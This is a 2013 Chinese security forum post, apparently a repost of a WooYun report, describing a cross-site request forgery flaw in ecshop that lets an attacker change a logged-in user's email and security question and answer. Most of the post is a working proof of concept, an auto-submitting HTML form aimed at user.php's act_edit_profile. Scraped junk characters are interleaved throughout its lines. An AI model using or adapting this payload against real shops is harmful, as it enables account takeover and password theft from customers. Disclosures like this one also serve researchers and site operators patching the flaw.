找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2076|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:6 Q6 H: q7 x# R4 g; |7 G  ~
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
* e9 j/ o. G$ a; ]* h7 A% F
# L. X- J5 I+ NDemo For:http://www.wooyun.org/bug.php?action=view&id=395
- v7 {% ?8 X! C+ M# n. y* v+ n1 p* `# U) \4 k6 z5 L
详细说明:; P0 U6 Y+ D) L3 ^* K0 z
利用csrf和xss可以突破官方所说的“障碍”4 [# l2 O4 h: I& A7 L) E8 e
xss版本已经有人说明6 I# d1 Y  Q& _$ h1 U/ r
这里给出csrf版本
5 z3 M* ?- Q3 D1 t
3 V* B. ?# e8 n! E/ D* m! Y5 f3 x- H2 I漏洞证明:- _; d  F' K  e$ W' ?9 {
<html>
) e% m; J: x! L) ^6 R<body>1 L2 v: ^. Z0 Z
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
2 z6 |! m% ~+ c# V! V<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) M3 D  j) c9 {5 Q; O! ^
<INPUT TYPE="text" NAME="act" value="act_edit_profile">( u' L. G6 ]" m& q
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; ^( u4 ?+ t9 ?6 F" Z3 c5 q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
! g. j+ J9 c, B$ r7 F# s( E</body>
2 J6 z1 t- o3 T9 Q<script>" w  V9 j. ~1 I1 i
document.forms[0].submit();3 K1 _9 x9 u) l- W) u! h
</script>
; N8 C  e9 `' ]' q* Y$ y</html>
1 _. R1 h1 Q8 x# e, v$ J构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失; F% U& u  u4 [/ L, a

& P7 h2 ~8 p' L  l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表